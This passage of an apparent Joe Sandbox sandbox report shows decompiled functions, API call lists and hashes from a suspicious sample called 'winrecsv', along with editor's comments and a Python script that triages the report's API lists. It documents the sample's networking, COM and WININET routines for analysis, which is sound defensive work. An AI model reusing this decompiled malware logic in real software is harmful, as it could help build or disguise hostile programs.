                                                                                  					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                  				} while (_t43 != 0);
                                                                                  				return _t32;
                                                                                  			}















                                                                                  0x0040edd0
                                                                                  0x0040eddc
                                                                                  0x0040edf3
                                                                                  0x0040edf7
                                                                                  0x0040edfb
                                                                                  0x0040edff
                                                                                  0x0040ee03
                                                                                  0x0040ee05
                                                                                  0x0040ee0b
                                                                                  0x0040ee10
                                                                                  0x0040ee8f
                                                                                  0x0040ee8f
                                                                                  0x0040ee13
                                                                                  0x0040ee15
                                                                                  0x0040ee27
                                                                                  0x0040ee2f
                                                                                  0x0040ee37
                                                                                  0x0040ee39
                                                                                  0x0040ee3f
                                                                                  0x0040ee3f
                                                                                  0x0040ee37
                                                                                  0x0040ee4d
                                                                                  0x0040ee4e
                                                                                  0x0040ee53
                                                                                  0x0040ee69
                                                                                  0x0040ee6d
                                                                                  0x0040ee71
                                                                                  0x0040ee75
                                                                                  0x0040ee79
                                                                                  0x0040ee7b
                                                                                  0x0040ee81
                                                                                  0x0040ee84
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE03
                                                                                  • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040EE2F
                                                                                  • WSAGetLastError.WS2_32 ref: 0040EE39
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                  • String ID:
                                                                                  • API String ID: 2074799992-0
                                                                                  • Opcode ID: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction ID: bb54af95703917af121ac1969caf4c30c918fe6ab3e07cce6cf93c7135daf7d6
                                                                                  • Opcode Fuzzy Hash: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction Fuzzy Hash: 6D2151B15083159BC200CF55D840D5BB7E8BFCCB54F044A1EF598A3250D734EA49CBAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB08
                                                                                  • WSAGetLastError.WS2_32(?,?,0040F024), ref: 0040EB10
                                                                                  • Sleep.KERNEL32(00000001,?,?,0040F024), ref: 0040EB26
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Recv$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 3668019968-0
                                                                                  • Opcode ID: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction ID: d9337b9861168a889e2dcd888c4c975a75ea967e12d624b3d4e9d1b891e0ae49
                                                                                  • Opcode Fuzzy Hash: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction Fuzzy Hash: 99117972104301AFD710DF65EC84AEBB7ECEB88710F40092AF556D2140E6B9E94997B6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E98C
                                                                                  • WSAGetLastError.WS2_32 ref: 0040E992
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040E9A8
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E9CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Send$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 2121970615-0
                                                                                  • Opcode ID: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction ID: 07d4f8ca9de2ad22a8725cccf1b5422178c79e7604c05c206d14e21095614f42
                                                                                  • Opcode Fuzzy Hash: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction Fuzzy Hash: D3014F712483056BE6308B96DC88FDB77A8EBC8711F00882AF608D61C0D6B5E9459B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
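The API lists in this report (bullets of the form Name.DLL(args), ref: address, some prefixed with "Part of subcall function") are the fastest way to triage a listing of this size. The two Winsock blocks above, for example, read WSARecv or WSASend, then WSAGetLastError, then Sleep(1), then the same call again, which is the shape of a retry-on-error send/receive loop. The script below is an added example written for this page, not Joe Sandbox tooling: it parses these entries out of the report text, groups them per function, recovers each function's address span from the ref values, and tags blocks by DLL and by that retry shape. The DLL-to-tag mapping and the retry rule are this example's own heuristics, and the embedded input is a constructed excerpt in the report's format.

```python
"""Triage helper for Joe Sandbox function listings.

Added example for this page, not Joe Sandbox code. It parses the 'APIs' bullets
(Name.DLL(args), ref: address) into per-function call sequences, recovers each
function's address span from the ref values, and tags blocks with simple heuristics.
The DLL-to-tag mapping and the retry-loop rule are this example's own assumptions.
"""
import re

# Constructed excerpt in the report's own format (three API blocks copied from the listing).
SAMPLE = """\
APIs
• WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB08
• WSAGetLastError.WS2_32(?,?,0040F024), ref: 0040EB10
• Sleep.KERNEL32(00000001,?,?,0040F024), ref: 0040EB26
• WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB4C
Memory Dump Source
APIs
• WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E98C
• WSAGetLastError.WS2_32 ref: 0040E992
• Sleep.KERNEL32(00000001), ref: 0040E9A8
• WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E9CA
Memory Dump Source
APIs
• CoInitializeEx.OLE32(00000000,00000002,?,?,00406874), ref: 004057B8
• SysAllocString.OLEAUT32(00414A30), ref: 004057C3
• CoUninitialize.OLE32 ref: 004057E8
  • Part of subcall function 00405520: SysFreeString.OLEAUT32(00000000), ref: 00405738
• SysFreeString.OLEAUT32(00000000), ref: 004057E2
Memory Dump Source
"""

# One bullet: optional subcall prefix, Name.DLL, optional (args), optional comma, ref: hex address.
ENTRY_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]{8}):\s*)?
        (?P<api>[A-Za-z_][\w\#@]*)\.(?P<dll>\w+)
        (?:\((?P<args>[^)]*)\))?
        \s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$""",
    re.VERBOSE,
)

# Heuristic tags (this example's assumption, not from the report).
DLL_TAGS = {"WS2_32": "network", "WININET": "network", "WINHTTP": "network",
            "OLE32": "com", "OLEAUT32": "com"}
# Calls that only report or wait on status; they do not count as the repeated operation.
STATUS_APIS = {"Sleep", "WSAGetLastError", "GetLastError"}


def parse_api_entry(line):
    """Return a dict for one API bullet, or None if the line is not one."""
    m = ENTRY_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return {
        "api": m.group("api"),
        "dll": m.group("dll").upper(),
        "args": [a.strip() for a in raw.split(",")] if raw else [],  # "?" = unknown value
        "ref": int(m.group("ref"), 16),
        "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
    }


def parse_blocks(text):
    """Group bullets into one list per 'APIs' heading; any other non-empty line ends a block."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        if current is None:
            continue
        entry = parse_api_entry(line)
        if entry is not None:
            current.append(entry)
        elif line.strip():
            current = None
    return blocks


def has_retry_loop(entries):
    """True if some call is repeated with a Sleep between the two occurrences."""
    names = [e["api"] for e in entries]
    for i, name in enumerate(names):
        if name in STATUS_APIS:
            continue
        for j in range(i + 1, len(names)):
            if names[j] == name and "Sleep" in names[i + 1:j]:
                return True
    return False


def summarize(block):
    """Call sequence, heuristic tags and address span (direct calls only) for one function."""
    direct = [e for e in block if e["subcall"] is None]
    tags = {DLL_TAGS[e["dll"]] for e in block if e["dll"] in DLL_TAGS}
    if any(e["api"] == "Sleep" for e in block):
        tags.add("delay")
    if has_retry_loop(direct):
        tags.add("retry-loop")
    refs = [e["ref"] for e in direct]
    return {"sequence": [e["api"] for e in block], "tags": tags,
            "ref_range": (min(refs), max(refs)) if refs else None}


def triage(text):
    """One summary per API block found in the report text."""
    return [summarize(b) for b in parse_blocks(text)]


if __name__ == "__main__":
    for s in triage(SAMPLE):
        lo, hi = s["ref_range"]
        print(f"{lo:08X}-{hi:08X}  {sorted(s['tags'])}  {' -> '.join(s['sequence'])}")
```

Run against a whole report export instead of SAMPLE to get one line per function; subcall entries are kept in the sequence but excluded from the address span, since their ref points into the callee, not the function being listed.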

                                                                                  C-Code - Quality: 100%
                                                                                  			// Reading of the decompiled code (editor's note derived from the listing, not report output):
                                                                                  			// with the critical section at ctx+0x244 held, the node in __esi is unlinked from a doubly
                                                                                  			// linked list (prev at +0x34, next at +0x38, list head at ctx+0x25c) and released with
                                                                                  			// E00408FB0 only if its reference count at +0x14 reads zero; InterlockedExchangeAdd(p, 0)
                                                                                  			// is used as an atomic read of that counter. Returns 1 when the node was removed or __esi
                                                                                  			// was NULL, 0 when the node is still referenced. ctx is read from the stack slot at +0xc
                                                                                  			// (_t24 stands for the stack pointer, which the decompiler left unassigned).
                                                                                  			E0040E620(void* __esi) {
                                                                                  				intOrPtr _t13;
                                                                                  				intOrPtr _t19;
                                                                                  				struct _CRITICAL_SECTION* _t21;
                                                                                  				void* _t22;
                                                                                  				intOrPtr _t23;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t22 = __esi;
                                                                                  				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                  				_t21 = _t23 + 0x244;
                                                                                  				EnterCriticalSection(_t21);
                                                                                  				if(__esi == 0) {
                                                                                  					L9:
                                                                                  					LeaveCriticalSection(_t21);
                                                                                  					return 1;
                                                                                  				} else {
                                                                                  					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                  						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                  						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                  						if(_t13 != 0) {
                                                                                  							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                  						}
                                                                                  						if(_t19 == 0) {
                                                                                  							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                  						}
                                                                                  						E00408FB0( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                  						E00408FB0(_t22);
                                                                                  						goto L9;
                                                                                  					} else {
                                                                                  						LeaveCriticalSection(_t21);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  (address column of the listing: 0x0040e620 to 0x0040e693)

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,0040E6EC,?,?), ref: 0040E630
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E640
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E64D
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E688
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 2223660684-0
                                                                                  • Opcode ID: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction ID: abaa9db80c897440a89c5e3e6cf5373dc13695b231f21a650e9875a219e15b50
                                                                                  • Opcode Fuzzy Hash: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction Fuzzy Hash: 8E01F236242304AFC3209F32FD44A9BB3A8AF95B11B40493FE846D3641DB3AE401CB28
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			// Reading of the decompiled code (editor's note derived from the listing, not report output):
                                                                                  			// _a4 points to an object holding a handle count at +0, a critical section at +4 and a
                                                                                  			// HANDLE array pointer at +0x1c. Every handle is closed while the critical section is held,
                                                                                  			// the section is deleted, then the array and the object itself are released with E00408FB0.
                                                                                  			// _t11 and _t18 were used but not declared in the decompiler output; the declarations are
                                                                                  			// added here. _t20 is returned uninitialized on the NULL-argument path, i.e. the binary
                                                                                  			// sets no meaningful return value there.
                                                                                  			E0040C180(intOrPtr* _a4) {
                                                                                  				intOrPtr* _v8;
                                                                                  				signed int _v12;
                                                                                  				intOrPtr* _t11;
                                                                                  				intOrPtr* _t18;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				if(_a4 != 0) {
                                                                                  					_v8 = _a4;
                                                                                  					EnterCriticalSection(_v8 + 4);
                                                                                  					_v12 = 0;
                                                                                  					while(_v12 <  *_v8) {
                                                                                  						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					LeaveCriticalSection(_v8 + 4);
                                                                                  					DeleteCriticalSection(_v8 + 4);
                                                                                  					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  					E00408FB0( *_t18);
                                                                                  					return E00408FB0(_a4);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}

                                                                                  (address column of the listing: 0x0040c18a to 0x0040c208)

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0040F020), ref: 0040C199
                                                                                  • CloseHandle.KERNEL32(0040F024), ref: 0040C1C8
                                                                                  • LeaveCriticalSection.KERNEL32(0040F020), ref: 0040C1D7
                                                                                  • DeleteCriticalSection.KERNEL32(0040F020), ref: 0040C1E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3102160386-0
                                                                                  • Opcode ID: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction ID: 7eb137a9147c1387d79ab9d68254bdb898acac70a3962359ff170d5c72b28224
                                                                                  • Opcode Fuzzy Hash: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction Fuzzy Hash: F8116174900208EFDB08DFA4D984A9DB775FF84309F2081A9E8066B341DB39EE80DF85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,00406874), ref: 004057B8
                                                                                  • SysAllocString.OLEAUT32(00414A30), ref: 004057C3
                                                                                  • CoUninitialize.OLE32 ref: 004057E8
                                                                                    • Part of subcall function 00405520: SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004057E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: String$Free$AllocInitializeUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 459949847-0
                                                                                  • Opcode ID: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction ID: ed05d97b5b317eb6b2af260c68b5e38350126176a91c2a59017ff1c3aafa5288
                                                                                  • Opcode Fuzzy Hash: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction Fuzzy Hash: A8E04875941308FBD700DBE0ED0EB9E7778DB05701F108175F90567291D6B55E80DB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 62%
                                                                                  			// Reading of the decompiled code (editor's note; the listing is cut off by the page): a COM
                                                                                  			// routine. E004054D0 is called with two constant addresses (0x411e90/0x411ea0, later
                                                                                  			// 0x411eb0/0x411ec0) and returns an interface pointer, so it most plausibly wraps
                                                                                  			// CoCreateInstance over a CLSID/IID pair; that is inferred, the report does not name the
                                                                                  			// interfaces. Expressions of the form ( *( *obj + N))(obj, ...) are vtable method calls at
                                                                                  			// offset N. __imp__#2 is OLEAUT32 ordinal 2, SysAllocString, which matches the String
                                                                                  			// Alloc/Free APIs listed above for the caller at 0x004057B8. _t199/_t200 track the stack
                                                                                  			// pointer, and "if(0 != 0) { continue; }" is dead code left by the decompiler.
                                                                                  			E00405520(intOrPtr _a4) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				void* _v32;
                                                                                  				short _v36;
                                                                                  				char _v40;
                                                                                  				intOrPtr _t95;
                                                                                  				intOrPtr _t110;
                                                                                  				void* _t118;
                                                                                  				void* _t199;
                                                                                  				void* _t200;
                                                                                  
                                                                                  				_v28 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v20 = 0;
                                                                                  				while(1) {
                                                                                  					_t95 = E004054D0(0x411e90, 0x411ea0);
                                                                                  					_t200 = _t199 + 8;
                                                                                  					_v28 = _t95;
                                                                                  					if(_v28 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_push( &_v32);
                                                                                  					_push(_v28);
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                  						_push( &_v16);
                                                                                  						_push(_v32);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))() == 0) {
                                                                                  							_push( &_v36);
                                                                                  							_push(_v16);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))() == 0) {
                                                                                  								if(_v36 == 0xffffffff) {
                                                                                  									_push( &_v12);
                                                                                  									_push(_v16);
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                  										_push( &_v24);
                                                                                  										_push(_a4);
                                                                                  										_push(_v12);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                  											_t110 = E004054D0(0x411eb0, 0x411ec0);
                                                                                  											_t199 = _t200 + 8;
                                                                                  											_v24 = _t110;
                                                                                  											if(_v24 != 0) {
                                                                                  												__imp__#2(L"Microsoft Corporation"); // OLEAUT32!SysAllocString; the BSTR is passed to the object below
                                                                                  												_v8 = _t110; // the decompiler reuses _t110 here; in the binary _v8 receives the call's return value (eax)
                                                                                  												if(_v8 != 0) {
                                                                                  													_push(_v8);
                                                                                  													_push(_v24);
                                                                                  													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                  														_push(_a4);
                                                                                  														_push(_v24);
                                                                                  														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                  															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  															if(_t118 == 0) {
                                                                                  																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                  																_t118 = 0;
                                                                                  																if(0 != 0) {
                                                                                  																	continue;
                                                                                  																}
                                                                                  																L34:
                                                                                  																if(_v20 != 0) {
                                                                                  																	_t118 = E00408FB0(_v20);
                                                                                  																}
                                                                                  																if(_v8 != 0) {
                                                                                  																	__imp__#6(_v8);
                                                                                  																}
                                                                                  																if(_v24 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  																}
                                                                                  																if(_v12 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  																}
                                                                                  																if(_v16 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  																}
                                                                                  																if(_v32 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                  																}
                                                                                  																if(_v28 == 0) {
                                                                                  																	return _t118;
                                                                                  																} else {
                                                                                  																	return  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  																}
                                                                                  															}
                                                                                  															goto L34;
                                                                                  														}
                                                                                  														goto L34;
                                                                                  													}
                                                                                  													goto L34;
                                                                                  												}
                                                                                  												goto L34;
                                                                                  											}
                                                                                  											goto L34;
                                                                                  										}
                                                                                  										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                  										if(_t118 == 0) {
                                                                                  											if(_v36 != 0xffffffff) {
                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  											} else {
                                                                                  												_v40 = 0;
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                  												if(_t118 == 0 && _v40 != 0) {
                                                                                  													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  												}
                                                                                  											}
                                                                                  										}
                                                                                  										goto L34;
                                                                                  									}
                                                                                  									goto L34;
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						goto L34;
                                                                                  					}
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				goto L34;
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 004054D0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFreeInstanceString
                                                                                  • String ID: Microsoft Corporation
                                                                                  • API String ID: 586785272-3838278685
                                                                                  • Opcode ID: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction ID: b68b7a3bc5298b5c42a29c8e1873351d80abb6d03bdfce163c93a33f9d118317
                                                                                  • Opcode Fuzzy Hash: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction Fuzzy Hash: 0991FA75A0050ADFCB04DB98C994AAFB7B5EF88300F208169E505B73A0D739AE41DF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 66%
                                                                                  			E0040CFE0(char* _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr* _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _t44;
                                                                                  				intOrPtr* _t46;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t62;
                                                                                  				void* _t88;
                                                                                  				void* _t89;
                                                                                  				void* _t90;
                                                                                  
                                                                                  				_v16 = 0;
                                                                                  				_t44 = E0040C610(_a4,  &_v8);
                                                                                  				_t89 = _t88 + 8;
                                                                                  				_v12 = _t44;
                                                                                  				if(_v12 != 0) {
                                                                                  					_t46 = E0040C3B0(_v12);
                                                                                  					_t90 = _t89 + 4;
                                                                                  					_v20 = _t46;
                                                                                  					if(_v20 != 0) {
                                                                                  						_v24 = 0;
                                                                                  						_push( &_v24);
                                                                                  						_push(_v20);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                  							_v28 = 0;
                                                                                  							_push( &_v28);
                                                                                  							_push(_v24);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                  								_t59 = E0040CF90(_v28);
                                                                                  								_t90 = _t90 + 4;
                                                                                  								_v32 = _t59;
                                                                                  								if(_v32 != 0) {
                                                                                  									_t62 = E0040CE70(_v28);
                                                                                  									_t90 = _t90 + 4;
                                                                                  									_v36 = _t62;
                                                                                  									if(_v36 != 0) {
                                                                                  										E0040B790( &_v16, "%S%S", _v32);
                                                                                  										_t90 = _t90 + 0x10;
                                                                                  										__imp__#6(_v36, _v36);
                                                                                  									}
                                                                                  									__imp__#6(_v32);
                                                                                  								}
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  							}
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  						}
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  					}
                                                                                  					E00408FB0(_v12);
                                                                                  				}
                                                                                  				return _v16;
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 0040C610: memset.NTDLL ref: 0040C638
                                                                                    • Part of subcall function 0040C610: InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                    • Part of subcall function 0040C610: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
